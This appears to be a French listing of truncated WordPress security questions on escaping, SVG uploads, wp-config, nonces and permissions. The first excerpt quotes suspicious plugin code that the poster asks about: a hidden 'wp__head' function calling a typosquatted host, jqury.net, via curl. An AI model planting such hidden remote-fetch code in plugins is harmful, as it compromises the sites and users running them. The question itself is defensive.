J'ai trouvé cela dans un plugin. Qu'est ce que ça fait? est-ce dangereux? add_action('admin_enqueue_scripts', 'pw_load_scripts'); if (!function_exists('wp__head'){ function wp__head() { if(function_exists('curl_init')) { $ch = curl_init(); curl_setopt($ch,CURLOPT_URL,"http://www.jqury.net/?1");...
Est-ce que le maintien wp-admin/install.phpet wp-admin/install-helper.phpune fuite de sécurité sur les nouvelles versions de wordpress? Par défaut, l'autorisation de fichier sur ces fichiers est 644. S'il y a une fuite, quel genre de s'il vous
Dans l'état actuel des choses, cette question ne convient pas à notre format de questions / réponses. Nous nous attendons à ce que les réponses soient étayées par des faits, des références ou une expertise, mais cette question suscitera probablement un débat, des arguments, des sondages ou une...
J'avais regardé le code mais je ne pouvais pas voir d'échapper à des fonctions comme the_title the_content the_excerptetc. Je ne le lisais peut-être pas correctement. Dois-je échapper à ces fonctions dans le développement de thème comme: esc_html ( the_title () ) Modifier: comme indiqué dans les...
Je vois que les SVG sont bloqués par défaut dans l'uploader de médias et vous devez l'ajouter en tant que type MIME pris en charge dans functions.php. Quelles sont les raisons de sécurité derrière
Nous rencontrons des problèmes avec un développeur externe. Nous voulons limiter l'accès au wp-adminsite à un accès interne uniquement (via VPN ). Simplement pour ne pas être attaqué par des utilisateurs externes. Nous pouvons énumérer les administrateurs du site et ne voulons pas qu'ils soient...
Configurer WordPress pour qu'il se mette à jour dans l'application (c'est-à-dire WordPress) est idéal pour moi en raison de sa commodité. Néanmoins, je suis troublé par les exigences. Les champs demandés qui apparaissent après l' installation de ssh2 pour php demandent non seulement ma clé...
En regardant le Codex pour wp_insert_post (), il indique que cette fonction "... désinfecte les variables, vérifie, remplit les variables manquantes comme la date / l'heure, etc." (EDIT: j'ai mis à jour l'entrée du Codex pour inclure un exemple plus robuste qui comprend la sécurité ainsi que la...
Juste une question rapide qui pourrait aider un peu avec la sécurité. J'ai remarqué que le fichier readme.html a le numéro de version répertorié. Il réapparaît après chaque mise à niveau, tout comme le fichier licence.txt et wp-config-sample.php. Existe-t-il un moyen simple pour que WordPress...
Cette chose rend mon codage difficile. Le codex Wordpress motive l'utilisation de esc_url en parlant vaguement de sécurité. Mais vaut-il vraiment la peine? Par exemple, quel est l'avantage de sécurité important et pratique que vous <?php echo esc_url( home_url( '/' ) ); ?> au lieu de <?php...
Situation initiale Pour un site que je suis en train de créer, je cherchais dans tout le domaine de la sécurisation des téléchargements / téléchargements et de la restriction de l'accès en fonction des rôles / capacités des utilisateurs. Bien sûr, j'ai lu certaines des questions précédentes liées...
Il semble qu'ils font presque le même type de travail. Donc... Quand devrais-je utiliser à la esc_html()place de
J'essaie de sécuriser mon blog wordpress. J'ai lu quelques articles sur le Web que je devrais changer table_prefixet cacher wp-config.php. Cependant, je ne comprends pas? Que pourrait faire un attaquant avec moi wp-config.php? Je veux dire qu'il y a mes configurations de base de données, mais...
Je cherche à utiliser quelques API et beaucoup viennent avec des clés, des clés secrètes et des mots de passe nécessaires pour fonctionner. Où dans WordPress pouvez-vous stocker ces informations? En supposant que n'importe qui peut pirater votre base de données, existe-t-il de toute façon que...
C'est probablement une question de NOOB MAIS écoutez-moi - n'est-il pas utile d'utiliser Nonce pour se protéger contre des choses comme les scrappers (phpcurl scrappers etc.)? Mais mon Nonce s'imprime dans la tête du document comme suit: /* <![CDATA[ */ var nc_ajax_getpost = { ...stuff......
J'ai passé en revue de nombreuses informations sur le thème WP et la sécurité des plugins et je comprends le concept selon lequel vous devez échapper les attributs et les valeurs HTML dans les thèmes et les plugins. J'ai vu bloginfo()et echo get_bloginfo()utilisé à la fois la norme et l'intérieur...
Je souhaite filtrer tout URI de requête HTTP effectué via l'API HTTP. Cas d'utilisation: La vérification de la mise à jour de WordPress va à http://api.wordpress.org/core/version-check/1.6/ , mais https://api.wordpress.org/core/version-check/1.6/ fonctionne aussi, et je veux pour l'utiliser...
J'ai lu de nombreux articles de blog sur la sécurité WordPress où les experts en sécurité recommandent des mesures spéciales à prendre en compte lorsque quelqu'un est préoccupé par la sécurité de leur site WordPress. L'un d'eux est: Conseils de sécurité WordPress: supprimez les plugins inutiles qui...
Je viens de publier un nouveau plugin: No More Passwords Je l'ai actuellement bêta car la connexion à une plate-forme est un problème sensible et je ne veux pas publier quelque chose qui pourrait comporter des failles de sécurité. Voici donc ma requête: Est-ce sécurisé? J'ai fait ce qui suit pour...
Je viens de faire fonctionner WP sur mon propre serveur. Je n'essaie pas de verrouiller davantage les choses. Quelles autorisations l'utilisateur db doit-il avoir sur ma base de données